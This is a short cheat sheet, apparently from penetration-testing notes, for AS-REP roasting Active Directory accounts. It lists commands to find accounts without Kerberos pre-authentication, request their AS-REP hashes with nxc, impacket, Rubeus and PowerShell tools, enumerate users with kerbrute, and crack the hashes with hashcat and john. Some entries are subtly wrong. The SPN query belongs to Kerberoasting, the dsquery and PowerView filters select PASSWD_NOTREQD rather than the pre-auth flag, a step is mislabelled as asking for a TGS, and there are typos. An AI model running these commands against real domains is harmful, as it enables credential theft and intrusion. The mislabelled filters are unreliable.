ASREPRoast

Identify

nxc ldap <IP> -u '' -p '' --query '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' ""

Remote

ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

Local

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

using dsqeury (elevated context required) (local only)

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontro

Local (powerview)

Exploit

Ask for TGS

nxc ldap <IP> -u '<USER>' -p '' --asreproast output.txt

Remote

impacket-GetNPUsers domain.local/svc-test -no-pass

Remote

Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt /user:svc-test /nowrap

Local

Get-ASREPHash -Username svc-test -verbose

Local - https://github.com/HarmJ0y/ASREPRoast

kerbrute userenum -d domain.local --dc <dcip> users.txt

remote

Crack ticket

hashcat -m 18200 --force -a 0 hashes.txt <wordlist>

john --wordlist=<wordlist> hashes.txt